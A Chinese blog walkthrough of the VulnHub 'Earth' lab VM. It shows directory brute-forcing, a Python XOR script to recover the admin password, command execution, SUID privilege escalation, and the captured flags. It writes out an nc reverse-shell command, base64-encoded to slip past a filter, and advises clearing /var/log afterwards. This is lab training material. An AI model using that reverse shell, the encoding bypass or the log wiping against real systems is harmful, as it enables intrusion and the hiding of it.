Vulnhub项目:Earth

最新推荐文章于 2024-01-07 02:04:45 发布
最新推荐文章于 2024-01-07 02:04:45 发布
阅读量722 收藏 1
点赞数 2
分类专栏: 渗透项目 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938645/article/details/130265310
版权

靶机地址:The Planets: Earth ~ VulnHub

渗透过程:

首先查看靶机描述,需要获取2个flag

老样子,确定靶机ip,具体的就不详细写了,看图即可

 探测靶机开放端口

如果不进行dns绑定,就会出现下面的错误

将它要求的,域名和ip进行绑定

 

之后访问域名,就可到达主页

主页上,有输入框 ,底下应该是被加密的字符串,先暂且不管它

再没有其他信息,进行目录爆破,发现了/admin/login

对另外一个目录爆破,发现了/robots.txt

访问后发现了个奇怪的目录,后面是.*

尝试给它加txt后缀,发现了文档

 

该文档告知我们用户名是terra,采用异或加密,testdata.txt是用来加密的。访问它,是一段字符串

 

随后,对登录框进行访问

既然已经说的那么明显了,主页上最后一行很长的字符串就应该是最后加密出来的密文,那就写一段破解脚本,脚本如下:

# _*_ coding: utf-8 _*_
"""
Time:     2023/4/20 13:32
Author:   Ays.Ie
"""
import binascii
str = '2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a'
pass_str = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
#pass_str转换为16进制
pass_str_hex = binascii.b2a_hex(pass_str.encode(encoding="utf-8")).decode('utf-8').replace("b'",'')
#进行xor运算
res = hex(int(str, 16)^int(pass_str_hex, 16)).replace('0x', '')
#将结果转换成字符串
res_txt = binascii.unhexlify(res).decode('utf-8')
print(res_txt)

 运行出来,发现了都是重复的,那应该密码就是框起来的

用户名:terra        密码:earthclimatechangebad4humans 

尝试登陆后,登陆成功,出现了一个命令执行框

尝试id,给出了当前id为apache

下一步,找flag文件,输入

find / -name "*flag*"

发现了flag.txt文件,查看后得到了user_flag

[user_flag_3353b67d6437f07ba7d34afd7d2fc27d] 

下一步,提权至root,获取root_flag,命令行输入下面的命令,查询suid的程序

find / -perm -4000 2>/dev/null

发现存在一个reser_root的二进制执行文件,利用命令框执行,执行失败

那就先反弹shell吧,在本地开启监听,反弹shell

nc -e /bin/bash 192.168.56.104 8800 

被禁用了!!!!没办法了吗?

利用base64绕过,尝试下

echo 'nc -e /bin/bash 192.168.56.104 8800' | base64

bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTA0IDg4MDAK

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTA0IDg4MDAK |base64 -d|bash

 

python生成一个交互式shell

利用nc将这个文件传到本地kali上进行分析

利用strace 对其进行分析后发现,缺少了这三个文件。

在shell中进入相应的目录,确实没有相关的文件,那就直接给创建上就行了

创建完后,再运行这个二进制执行程序,它将root的密码初始为Earth了,直接切换root用户即可提权

最后获取root_flag!

[root_flag_b0da9554d29db2117b02aa8b66ec492e] 

渗透结束!

总结:

最后总结下思路:

1、确定靶机ip、收集靶机开放端口、根据信息,进行ip和域名的绑定

2、访问页面,对页面进行收集,主要是查看有什么功能

3、对页面进行目录爆破,发现后台路径,隐藏文件

4、根据相关文件,进一步获取用户名和密码

5、编写脚本破译密码

6、利用命令执行,找寻flag、反弹shell,如果被拦截,可以利用其他方式绕过,例如base64、编码等

7、找寻具有suid的执行文件,提权

8、提权失败、strace分析文件,满足文件需求,再次执行

9、提权成功,获取flag

10、清理痕迹,/var/log

Ays.Ie
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
osgEarth VS2022项目
12-19
1.包含3rdParty_x64 依赖的第三方库,编译的时候需要引入头文件和lib; 2. build, CMake 编译源码osgearth-2.10后的项目,编译的时候需要引入OSG源码中的头文件和lib
earth:3D地球项目
06-13
Cesium 是一个 JavaScript 库,用于在没有插件的 Web 浏览器中创建 3D 地球仪和 2D 地图。 它将 WebGL 用于硬件加速图形,并且是跨平台、跨浏览器的,并针对动态数据可视化进行了调整。开始请参阅教程。...
Vulnhub-Earth
m0_52016680的博客
09-10 825
Vulnhub类OSCP靶场
Vulnhub 系列 -- Earth
ch3cke的博客
03-21 3812
前期信息收集 nmap主机发现,主要探测存活主机的IP和以及主机开放的端口信息: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.139.135/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:19 EDT Nmap scan report for 192.168.139.2 Host is up (0.0017s latency). Nmap scan report for 192.168.139.13
vulnhub——Earth靶机
Re1_zf的博客
10-28 2045
再次nmap进行扫描,之前返回HTTP400的页面就没问题了。攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名。这里是一个命令执行的输入框,有命令执行漏洞存在的可能性。结合前面的用户名,找到之前扫出来的的登录页面尝试一下。前面两个密钥的解码都是乱码,只有最后一个可以正常解码。对反弹shell的命令进行一下base64编码试试。查看返回信息的话,应该就是执行的过程中出了什么差错。(注意这里的命令不一样了,少去了前面的部分)猜测一下后缀,测出来后缀为txt后缀。结合前面页面显示的密钥可以尝试一下。
vulnhub THE PLANETS: EARTH
qq_41696858的博客
12-11 675
本文参考了大佬的文章: https://blog.gibbons.digital/hacking/2021/11/09/earth.html 好久没做靶机了,周末做做靶机挺好的 老三样,先确定靶机地址 arp-scan -I eth0 192.168.200.1/24 靶机地址192.168.200.131 nmap -A -sS -sC -p- 192.168.200.131 返回来80端口和443端口, 两个重要的DNS:DNS:earth.local, DNS:terratest.earth.loca
Leku,:earth_africa:android的地图位置选择器组件。.zip
10-13
android的位置选择器
Earth:Earth 是一个基于 ClanCatsFramework 的优雅 CMS
07-05
地球内容管理系统 世界不需要另一个 CMS,世界需要这个 CMS。 愚蠢的笑话放在一边。 这是一个正在进行的工作 我们的目标是创建一个真正易于使用且高度可扩展的 CMS。 开发人员可以在不做出巨大妥协的情况下做他想...
Earth_orbit_model:Earth_orbit_v2.1
02-23
Earth_orbit_model:Earth_orbit_v2.1
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1222
一次打靶记录。
打靶分享:VulnHub-Earth
最新发布
weixin_66249173的博客
01-07 1105
此时使用nmap -sC 10.0.0.141发现了不一样的内容,就是443端口这里发现了DNS的两个域名,所以我就查了一下-sC这个参数(平时信息收集其实用的不多)所以,最好的解决办法就是直接在终端打开虚拟机火狐浏览器并访问earth.local和terratest.earth.local在第一个域名中如果想发送message必须要输入message key。此时就可以访问这两个域名了,但是不要用物理机的浏览器直接访问。现在就差解密的内容了,显然下面这张图中的那三行是我们要解密的内容。
vulnhub Earth:解题思路
lm19770429的专栏
01-28 3171
靶场下载地址: The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough links are available.https://www.vulnhub.com/entry/the-planets-earth,755/#download Earth is an easy box though you will likely find it more challenging t
Vulnhub】之THE PLANETS: EARTH
zg_111的博客
03-31 1303
XOR(异或)运算strace诊断调试工具nc传输文件。
【靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2280
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 959
靶机渗透练习-The Planets:Earth
VulnHub-Earth打靶记录
qq_43534481的博客
04-19 2335
VulnHub-Earth 打靶记录 详细解题思路
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1025
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
VulnHub日记(十五): THE PLANETS: EARTH
Dawn_Xi的博客
11-27 2598
参考链接 Vulnhub:THE PLANETS: EARTH 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.136 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.136 dirsearch 枚举目录443和80 dirsearch -u https://192.168.56.136 -w /usr/share/wordlists/dirbuster/directory-lis
渗透测试-vulnhub靶机 Earth
2301_79441074的博客
11-23 104
dns解析 ,xor解码,
the planets: earth靶机
04-11
问题:关于行星:地球和静机。...回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值